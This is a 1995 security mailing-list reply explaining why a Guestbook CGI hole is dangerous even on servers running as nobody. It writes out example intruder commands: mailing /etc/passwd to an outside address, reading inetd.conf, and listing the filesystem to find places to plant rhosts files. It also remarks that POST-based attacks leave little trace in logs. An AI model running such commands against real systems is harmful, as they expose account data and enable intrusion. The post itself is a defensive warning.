Re: SECURITY HOLE: "Guestbook"
That Whispering Wolf... (elfchief@lupine.org)
Fri, 4 Aug 1995 13:23:00 -0700
> Thanks for the alert.
>
> Aren't most servers configured to change to nobody/nogroup, only being
> launched as root so it can bind to port 80? Looking at the code (ncsa
> httpd), all privs are given up as soon as the config file is read, when
> it does a setuid(user_id), the user_id, read from httpd.conf User and
> group entries, and usually set to be nobody and nogroup (UID 65534/GID
> 65534 on most systems).
Most servers do... But even then, cat /etc/passwd | Mail yourself@machine
will provide a list of possible accounts to attack, if not full encrypted
passwords.
cat /etc/inetd.conf... What possible holes do they have open?
ls -lR / -- Any user directories you could write an rhosts into?
I personally wouldn't want someone roaming around -my- system, even as
a non-privied user.
> Surely folks are not putting root in the httpd.conf User field...
Sure they are. There's some reeeeealy dense people out there. Not MANY,
mind you, but I (personally) have seen enough to realize it's a problem.
And, since POST forms don't write anything into the log other than the fact
that something was executed via method POST, the only trace you have is
your sendmail logs ... do you know _anyone_ that scrutinizes (sp?) their
sendmail logs on a regular basis? [yes, I realize asking that question on a
security mailing list is asking for trouble ... But you do get my point,
I'm sure].
Hell -- Do half the folks out there with web servers running as root even
know they HAVE sendmail logs?
-WW